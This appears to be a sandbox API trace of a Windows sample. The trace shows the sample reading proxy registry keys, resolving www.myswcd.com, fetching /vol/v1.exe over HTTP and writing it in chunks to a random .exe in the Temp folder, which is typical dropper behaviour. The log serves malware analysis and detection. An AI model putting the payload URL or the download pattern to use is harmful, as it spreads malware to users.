Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1 Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1 Fn
DNS Resolve Name host = www.myswcd.com, address_out = 54.191.17.130 True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1 Fn
Socket Connect remote_address = 54.191.17.130, remote_port = 80 True 1 Fn
Socket Close type = SOCK_STREAM True 1 Fn
Socket Send flags = NO_FLAG_SET, size = 74, size_out = 74 True 1 Fn, Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1 Fn
Inet Open Connection protocol = http, server_name = www.myswcd.com, server_port = 80 True 1 Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /vol/v1.exe True 1 Fn
Inet Send HTTP Request headers = host: www.myswcd.com, connection: Keep-Alive, url = www.myswcd.com/vol/v1.exe True 1 Fn, Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1 Fn, Data
Inet Read Response size = 4096, size_out = 4096 True 1 Fn, Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 4664 True 1 Fn, Data
Inet Read Response size = 65536, size_out = 4664 True 1 Fn, Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1 Fn, Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4333 True 1 Fn, Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1 Fn, Data
Inet Read Response size = 65536, size_out = 65536 True 1 Fn, Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1 Fn, Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1624 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1624 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 63064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 33744 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 33744 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 33744 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 5840 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 5840 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 5840 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 33744 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 33744 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 33744 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 32120 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 32120 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 32120 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 24984 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 24984 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 24984 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 17684 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 17684 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 17684 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 39420 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 39420 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 39420 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 20604 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 20604 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 20604 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 54184 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 54184 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 54184 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 24984 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 24984 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 24984 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 61484 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 61484 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61484 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 57432 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 57432 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 57432 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 23524 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 23524 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 23524 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65192 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2580 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2580 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 64020 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 164 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 164 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61604 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 38452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 38452 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 38452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 344 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 344 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61784 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 25148 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 25148 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 25148 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 18148 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 18148 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 17804 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 25148 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 25148 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 25148 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 628 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 628 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61724 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 26444 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 26444 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 26444 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 32448 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 32448 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 32448 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 29364 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 29364 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 29364 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 36828 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 36828 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 36828 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 6004 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 6004 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 6004 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 492 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 492 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61932 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1624 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1624 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 63064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 49804 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 49804 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 49804 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1624 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1624 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 63064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 62944 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 62944 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 62944 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 14600 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 14600 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 14600 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
